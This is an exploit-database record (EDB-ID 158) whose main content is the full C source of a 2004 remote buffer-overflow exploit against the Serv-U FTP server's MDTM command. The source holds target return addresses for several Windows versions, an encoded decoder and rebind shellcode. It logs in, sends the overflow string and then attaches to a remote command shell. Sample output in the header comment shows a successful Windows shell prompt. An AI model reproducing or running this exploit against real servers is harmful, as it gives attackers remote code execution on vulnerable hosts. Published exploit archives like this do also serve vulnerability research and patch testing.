{"id": "EDB-ID:158", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow", "description": "", "published": "2004-02-27T00:00:00", "modified": "2004-02-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/158", "reporter": "Sam", "references": [], "cvelist": ["2004-0330"], "immutableFields": [], "lastseen": "2022-08-16T09:44:16", "viewCount": 25, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1661182887, "score": 1661176728, "epss": 1678791570}, "_internal": {"score_hash": "ed6e2a27c5dc1c67900b42463c2b9ba3"}, "sourceHref": "https://www.exploit-db.com/download/158", "sourceData": "/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x \"MDTM\" Command remote overflow exploit\r\n*\r\n* Copyright (c) SST 2004 All rights reserved.\r\n*\r\n* Public version\r\n*\r\n* BUG find by bkbll (bkbll@cnhonker.com), cool! 
:ppPPppPPPpp :D\r\n*\r\n* code by Sam and 2004/01/07\r\n* <chen_xiaobo@venustech.com.cn>\r\n* <Sam@0x557.org>\r\n* \r\n*\r\n* Revise History:\r\n* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.\r\n* 2004/01/09 connect back shellcode added :)\r\n* 2004/01/08 21:04 upgrade now :), we put shellcode in file parameter\r\n* we can attack pacthed serv-U;PPPp by airsupply\r\n* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now \r\n* :D thx airsupply\r\n*\r\n* Compile: gcc -o ex_servu ex_servu.c\r\n*\r\n* how works?\r\n* [root@core exp]# ./sv -h 192.168.10.119 -t 3\r\n* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit\r\n* bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org)\r\n*\r\n* # Connecting......\r\n* [+] Connected.\r\n* [*] USER ftp .\r\n* [*] 10 bytes send.\r\n* [*] PASS sst@SERV-u .\r\n* [*] 17 bytes send.\r\n* [+] login success .\r\n* [+] remote version: Serv-U v4.x with Windows XP EN SP1\r\n* [+] trigger vulnerability !\r\n* [+] 1027 bytes overflow strings sent!\r\n* [+] successed!!\r\n*\r\n*\r\n* Microsoft Windows XP [Version 5.1.2600]\r\n* (C) Copyright 1985-2001 Microsoft Corp.\r\n*\r\n* [Sam Chen@SAM C:\\]#\r\n*\r\n*\r\n* some thanks/greets to:\r\n* bkbll (he find this bug :D), airsupply, kkqq, icbm\r\n* and everyone else who's KNOW SST;P\r\n* http://0x557.org\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdarg.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netinet/tcp.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <assert.h>\r\n#include <fcntl.h>\r\n#include <sys/time.h>\r\n\r\n#define VER \"v5.0\"\r\n\r\n#define clearbit(buff) bzero(buff, sizeof (buff));\r\n#define padding(buff, a) memset(buff, a, sizeof (buff));\r\n\r\n#define MAX_LEN 2048\r\n#define MAX_NUM 4\r\n\r\nint x = 0, port = 21, shellport;\r\nchar pass[20], user[20];\r\n\r\nstruct archs 
{\r\n char *desc;\r\n unsigned int magic;\r\n\r\n}architectures[] = {\r\n\r\n\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K CN\", //winmm.dll\r\n 0x77535985\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version\", //winmm.dll\r\n 0x77531790\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K EN\",\r\n 0x77575985\r\n\r\n },\r\n\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows XP CN SP1\",\r\n 0x76b12f69\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows XP EN SP1\",\r\n 0x76b42a3a\r\n\r\n}\r\n\r\n};\r\n\r\nchar decoder [] =\r\n/* 36 bytes cool decoder by airsupply :) */\r\n\r\n\"\\x90\\x90\\x90\\x5E\\x5F\\x5B\\xBE\\x52\\x52\\x49\\x41\\x46\\xBF\\x52\\x52\\x31\"\r\n\"\\x41\\x47\\x43\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\"\r\n\"\\xFF\\xD3\\x90\\x90\";\r\n\r\n/* fork + rebind shellcode by airsupply (one way shellcode) */\r\nchar shellcode [] =\r\n\r\n\"\\x53\\x52\\x49\\x41\"\r\n\r\n/*port offset 120 + 4*/\r\n\"\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xD9\\x85\\x12\\x99\\x12\\xD9\"\r\n\"\\x91\\x18\\x75\\x19\\x98\\x99\\x99\\x12\\x65\\x12\\x76\\x32\\x70\\x8B\\x9B\\x99\"\r\n\"\\x99\\xC7\\xAA\\x50\\x28\\x90\\x66\\xEE\\x65\\x71\\xB9\\x98\\x99\\x99\\xF1\\xF5\"\r\n\"\\xF5\\x99\\x99\\xF1\\xAA\\xAB\\xB7\\xFD\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\xCC\"\r\n\"\\x9D\\x32\\xAA\\x50\\x28\\x9C\\x66\\xEE\\x65\\x71\\x99\\x98\\x99\\x99\\x12\\x6C\"\r\n\"\\x71\\x94\\x98\\x99\\x99\\xAA\\x66\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\"\r\n\"\\x98\\x99\\x99\\x66\\xCF\\xB5\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\"\r\n\"\\xA9\\x12\\x41\\xCE\\xCE\\xF1\\x9B\\x99\\x8C\\x5B\\x12\\x55\\xCA\\xC8\\xF3\\x8F\"\r\n\"\\xC8\\xCA\\x66\\xCF\\xAD\\xC0\\xC2\\x1C\\x59\\xEC\\x68\\xCE\\xCA\\x66\\xCF\\xA1\"\r\n\"\\xCE\\xC8\\xCA\\x66\\xCF\\xA5\\x12\\x49\\x10\\x1F\\xD9\\x98\\x99\\x99\\xF1\\xFC\"\r\n\"\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\\x99\\x99\\x1A\\x75\"\r\n\"\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x
32\\x7B\\x64\\x5F\\xDD\"\r\n\"\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\\xCD\\xBD\\xD1\\x10\"\r\n\"\\xCD\\xBD\\xD5\\x10\\xCD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\\x27\\xDD\\x98\\x99\"\r\n\"\\x99\\xCE\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\x2F\\xA9\\x98\\x99\"\r\n\"\\x99\\xC8\\x66\\xCF\\x91\\xAA\\x59\\xD1\\xC9\\x66\\xCF\\x95\\xCA\\xCC\\xCF\\xCE\"\r\n\"\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\"\r\n\"\\x12\\xC3\\xB9\\x9A\\x44\\x7A\\xA9\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\"\r\n\"\\xAA\\x59\\x35\\xA3\\x79\\xED\\x9E\\x58\\x56\\x9E\\x9A\\x61\\x72\\x6B\\xA2\\xE5\"\r\n\"\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\"\r\n\"\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\\xC8\\x66\"\r\n\"\\xED\\xBD\\x91\\x34\\xC9\\x71\\x3B\\x66\\x66\\x66\\x1A\\x5D\\x9D\\xC0\\x32\\x7B\"\r\n\"\\x74\\x5A\\xF1\\xFC\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\"\r\n\"\\x99\\x99\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\"\r\n\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\"\r\n\"\\xDD\\xBD\\xD1\\x10\\xDD\\xBD\\xD5\\x10\\xDD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\"\r\n\"\\x27\\xDD\\x98\\x99\\x99\\xCE\\xC9\\xC8\\xC8\\xF3\\x9D\\xC8\\xC8\\xC8\\x66\\x2F\"\r\n\"\\xA9\\x98\\x99\\x99\\xC8\\x66\\xCF\\x91\\x18\\x75\\x99\\x9D\\x99\\x99\\xF1\\x9E\"\r\n\"\\x99\\x98\\x99\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\x89\\xF3\\xD9\\xF1\"\r\n\"\\x99\\x89\\x99\\x99\\xF1\\x99\\xC9\\x99\\x99\\xF3\\x99\\x66\\x2F\\xDD\\x98\\x99\"\r\n\"\\x99\\x66\\xCF\\x8D\\x10\\x1D\\xBD\\x21\\x99\\x99\\x99\\x10\\x1D\\xBD\\x2D\\x99\"\r\n\"\\x99\\x99\\x12\\x15\\xBD\\xF9\\x9D\\x99\\x99\\x5E\\xD8\\x62\\x09\\x09\\x09\\x09\"\r\n\"\\x5F\\xD8\\x66\\x09\\x1A\\x70\\xCC\\xF3\\x99\\xF1\\x99\\x89\\x99\\x99\\xC8\\xC9\"\r\n\"\\x66\\x2F\\xDD\\x98\\x99\\x99\\x66\\xCF\\x81\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\"\r\n\"\\x66\\xCF\\x85\\x66\\x2F\\xD1\\x9
8\\x99\\x99\\x66\\xCF\\xB9\\xAA\\x59\\xD1\\xC9\"\r\n\"\\x66\\xCF\\x95\\x71\\x70\\x64\\x66\\x66\\xAB\\xED\\x08\\x95\\x50\\x25\\x3F\\xF2\"\r\n\"\\x16\\x6B\\x81\\xF8\\x51\\xCE\\xD6\\x88\\x68\\xE2\\x05\\x76\\xC1\\x96\\xD8\\x0E\"\r\n\"\\x51\\xCE\\xD6\\x8E\\x4F\\x15\\x07\\x6A\\xFA\\x10\\x48\\xD6\\xA4\\xF3\\x2D\\x19\"\r\n\"\\xB4\\xAB\\xE1\\x47\\xFD\\x89\\x3E\\x44\\x95\\x06\\x4A\\xD2\\x28\\x87\\x0E\\x98\"\r\n\"\\x06\\x06\\x06\\x06\"\r\n\"\\x53\\x52\\x31\\x41\";\r\n\r\n\r\n/* new:\r\n* tcp connect with no block socket, host to ip.\r\n* millisecond timeout, it's will be fast.\r\n*;D\r\n* 2003/06/23 add by Sam\r\n*/\r\nint new_tcpConnect (char *host, unsigned int port, unsigned int timeout)\r\n{\r\n int sock,\r\n flag,\r\n pe = 0;\r\n size_t pe_len;\r\n struct timeval tv;\r\n struct sockaddr_in addr;\r\n struct hostent* hp = NULL;\r\n fd_set rset;\r\n\r\n // reslov hosts\r\n hp = gethostbyname (host);\r\n if (NULL == hp) {\r\n perror (\"tcpConnect:gethostbyname\\n\");\r\n return -1;\r\n }\r\n\r\n sock = socket (AF_INET, SOCK_STREAM, 0);\r\n if (-1 == sock) {\r\n perror (\"tcpConnect:socket\\n\");\r\n return -1;\r\n }\r\n\r\n addr.sin_addr = *(struct in_addr *) hp->h_addr;\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons (port);\r\n\r\n /* set socket no block\r\n */\r\n flag = fcntl (sock, F_GETFL);\r\n if (-1 == flag) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n flag |= O_NONBLOCK;\r\n if (fcntl (sock, F_SETFL, flag) < 0) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (connect (sock, (const struct sockaddr *) &addr,\r\n sizeof(addr)) < 0 &&\r\n errno != EINPROGRESS) {\r\n perror (\"tcpConnect:connect\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n /* set connect timeout\r\n * use millisecond\r\n */\r\n tv.tv_sec = timeout/1000;\r\n tv.tv_usec = timeout%1000;\r\n\r\n FD_ZERO (&rset);\r\n FD_SET (sock, &rset);\r\n\r\n if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {\r\n// 
perror (\"tcpConnect:select\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n pe_len = sizeof (pe);\r\n\r\n if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {\r\n perror (\"tcpConnect:getsockopt\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (pe != 0) {\r\n errno = pe;\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n pe = 1;\r\n pe_len = sizeof (pe);\r\n\r\n if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){\r\n perror (\"tcpConnect:setsockopt\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n return sock;\r\n}\r\n\r\n/* rip code, from hsj */\r\nint sh (int in, int out, int s)\r\n{\r\n char sbuf[128], rbuf[128];\r\n int i,\r\n ti, fd_cnt,\r\n ret=0, slen=0, rlen=0;\r\n fd_set rd, wr;\r\n\r\n fd_cnt = in > out ? in : out;\r\n fd_cnt = s > fd_cnt ? s : fd_cnt;\r\n fd_cnt ++;\r\n\r\n for (;;) {\r\n FD_ZERO (&rd);\r\n if (rlen < sizeof (rbuf))\r\n FD_SET (s, &rd);\r\n if (slen < sizeof (sbuf))\r\n FD_SET (in, &rd);\r\n\r\n FD_ZERO (&wr);\r\n if (slen)\r\n FD_SET (s, &wr);\r\n if (rlen)\r\n FD_SET (out, &wr);\r\n\r\n if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))\r\n break;\r\n if (FD_ISSET (in, &rd)) {\r\n if((i = read (in, (sbuf+slen),\r\n (sizeof (sbuf) - slen))) == (-1)) {\r\n ret = -2;\r\n break;\r\n }\r\n else if (i == 0) {\r\n ret = -3;\r\n break;\r\n }\r\n slen += i;\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (s, &wr)) {\r\n if ((i = write (s, sbuf, slen)) == (-1))\r\n break;\r\n if (i == slen)\r\n slen = 0;\r\n else {\r\n slen -= i;\r\n memmove (sbuf, sbuf + i, slen);\r\n }\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (s, &rd)) {\r\n if ((i = read (s, (rbuf + rlen),\r\n (sizeof (rbuf) - rlen))) <= 0)\r\n break;\r\n rlen += i;\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (out, &wr)) {\r\n if ((i = write (out, rbuf, rlen)) == (-1))\r\n break;\r\n if (i == 
rlen)\r\n rlen = 0;\r\n else {\r\n rlen -= i;\r\n memmove (rbuf, rbuf+i, rlen);\r\n }\r\n }\r\n }\r\n return ret;\r\n}\r\n\r\n\r\nint new_send (int fd, char *buff, size_t len)\r\n{\r\n int ret;\r\n\r\n if ((ret = send (fd, buff, len, 0)) <= 0) {\r\n perror (\"new_write\");\r\n return -1;\r\n }\r\n\r\n return ret;\r\n\r\n}\r\n\r\nint new_recv (int fd, char *buff, size_t len)\r\n{\r\n int ret;\r\n\r\n if ((ret = recv (fd, buff, len, 0)) <= 0) {\r\n perror (\"new_recv\");\r\n return -1;\r\n }\r\n\r\n return ret;\r\n}\r\n\r\nint ftp_login (char *hostName, short port, char *user, char *pass)\r\n{\r\n int ret, sock;\r\n char buff[MAX_LEN];\r\n\r\n fprintf (stderr, \"# Connecting...... \\n\");\r\n if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {\r\n fprintf (stderr, \"[-] failed. \\n\");\r\n return -1;\r\n }\r\n\r\n clearbit (buff);\r\n\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"220\")) {\r\n fprintf (stderr, \"[-] failed. \\n\");\r\n return -1;\r\n }\r\n fprintf (stderr, \"[+] Connected. \\n\");\r\n\r\n sleep (1);\r\n fprintf (stderr, \"[*] USER %s .\\n\", user);\r\n clearbit (buff);\r\n snprintf (buff, sizeof (buff), \"USER %s\\r\\n\", user);\r\n ret = new_send (sock, buff, strlen (buff));\r\n fprintf (stderr, \"[*] %d bytes send. \\n\", ret);\r\n\r\n sleep (1);\r\n\r\n clearbit (buff);\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"331\")) {\r\n fprintf (stderr, \"[-] user failed. \\n%s\\n\", buff);\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[*] PASS %s .\\n\", pass);\r\n clearbit (buff);\r\n snprintf (buff, sizeof (buff), \"PASS %s\\r\\n\", pass);\r\n ret = new_send (sock, buff, strlen (buff));\r\n fprintf (stderr, \"[*] %d bytes send. \\n\", ret);\r\n\r\n sleep (1);\r\n\r\n clearbit (buff);\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"230\")) {\r\n fprintf (stderr, \"[-] pass failed. 
\\n%s\\n\", buff);\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[+] login success .\\n\");\r\n\r\n return sock;\r\n\r\n}\r\n\r\nvoid do_overflow (int sock)\r\n{\r\n int ret, i;\r\n unsigned short newport;\r\n char Comand [MAX_LEN] = {0}, chmodBuffer [600], rbuf[256];\r\n\r\n clearbit (Comand);\r\n clearbit (rbuf);\r\n\r\n clearbit (chmodBuffer);\r\n \r\n for(i = 0; i < 47; i++) \r\n strcat(chmodBuffer, \"a\");\r\nfor(i = 0; i < 16; i += 8) {\r\n *(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;\r\n *(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78; //pop reg pop reg ret\r\n}\r\n\r\n\r\nnewport = htons (shellport)^(unsigned short)0x9999;\r\nmemcpy (&shellcode[120 + 4], &newport, 2);\r\n\r\n strcat(chmodBuffer, decoder);\r\n \r\n\r\n fprintf (stderr, \"[+] remote version: %s\\n\", architectures[x].desc);\r\n\r\n fprintf (stderr, \"[+] trigger vulnerability !\\n \");\r\n strcpy (Comand, \"MDTM 20031111111111+\");\r\n strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);\r\n strcat (Comand, \" \");\r\n\r\n\r\n strcat (Comand, shellcode);\r\n \r\n strcat (Comand, \"hacked_by.sst\\r\\n\");\r\n\r\n ret = new_send (sock, Comand, strlen (Comand));\r\n fprintf (stderr, \"[+] %d bytes overflow strings sent!\\n\", ret);\r\n\r\n\r\n return;\r\n}\r\n\r\n/* print help messages.\r\n* just show ya how to use.\r\n*/\r\nvoid showHELP (char *p)\r\n{\r\n int i;\r\n\r\n fprintf (stderr, \"Usage: %s [Options] \\n\", p);\r\n fprintf (stderr, \"Options:\\n\"\r\n \"\\t-h [remote host]\\tremote host\\n\"\r\n \"\\t-P [server port]\\tserver port\\n\"\r\n \"\\t-t [system type]\\tchoice the system type\\n\"\r\n \"\\t-u [user name]\\tlogin with this username\\n\"\r\n \"\\t-p [pass word]\\tlogin with this passwd\\n\"\r\n \"\\t-d [shell port]\\trebind using this port (default: ftpd port)\\n\\n\");\r\n\r\n\r\n printf (\"num . 
description\\n\");\r\n printf (\"----+-----------------------------------------------\"\r\n \"--------\\n\");\r\n for (i = 0; i <= MAX_NUM; i ++) {\r\n printf (\"%3d | %s\\n\", i, architectures[i].desc);\r\n }\r\n printf (\" '\\n\");\r\n return;\r\n}\r\n\r\nint main (int c, char *v[])\r\n{\r\n int ch, fd, sd;\r\n char *hostName = NULL, *userName = \"ftp\", *passWord = \"sst@SERV-u\";\r\n shellport = port;\r\n \r\n\r\n fprintf (stderr, \"Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit \"VER\"\\n\"\r\n \"bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\\n\\n\");\r\n\r\n if (c < 2) {\r\n showHELP (v[0]);\r\n exit (1);\r\n }\r\n\r\n while((ch = getopt(c, v, \"h:t:u:p:P:c:d:\")) != EOF) {\r\n switch(ch) {\r\n case 'h':\r\n hostName = optarg;\r\n break;\r\n case 't':\r\n x = atoi (optarg);\r\n if (x > MAX_NUM) {\r\n printf (\"[-] wtf your input?\\n\");\r\n exit (-1);\r\n }\r\n break;\r\n case 'u':\r\n userName = optarg;\r\n break;\r\n case 'p':\r\n passWord = optarg;\r\n break;\r\n case 'P':\r\n port = atoi (optarg);\r\n break;\r\n case 'd':\r\n shellport = atoi (optarg);\r\n break;\r\n default:\r\n showHELP (v[0]);\r\n return 0;\r\n }\r\n }\r\n\r\n\r\n fd = ftp_login (hostName, port, userName, passWord);\r\n if (fd <= 0) {\r\n printf (\"[-] can't connnect\\n\");\r\n exit (-1);\r\n }\r\n\r\n do_overflow (fd);\r\n\r\nclose (fd);\r\n \r\n sleep (3);\r\n \r\n sd = new_tcpConnect (hostName, shellport, 3000);\r\n if (sd <= 0) {\r\n printf (\"[-] failed\\n\");\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[+] successed!!\\n\\n\\n\");\r\n sh (0, 1, sd);\r\n\r\n close (sd);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n// milw0rm.com [2004-02-27]", "osvdbidlist": ["4073"], "exploitType": "remote", "verified": true}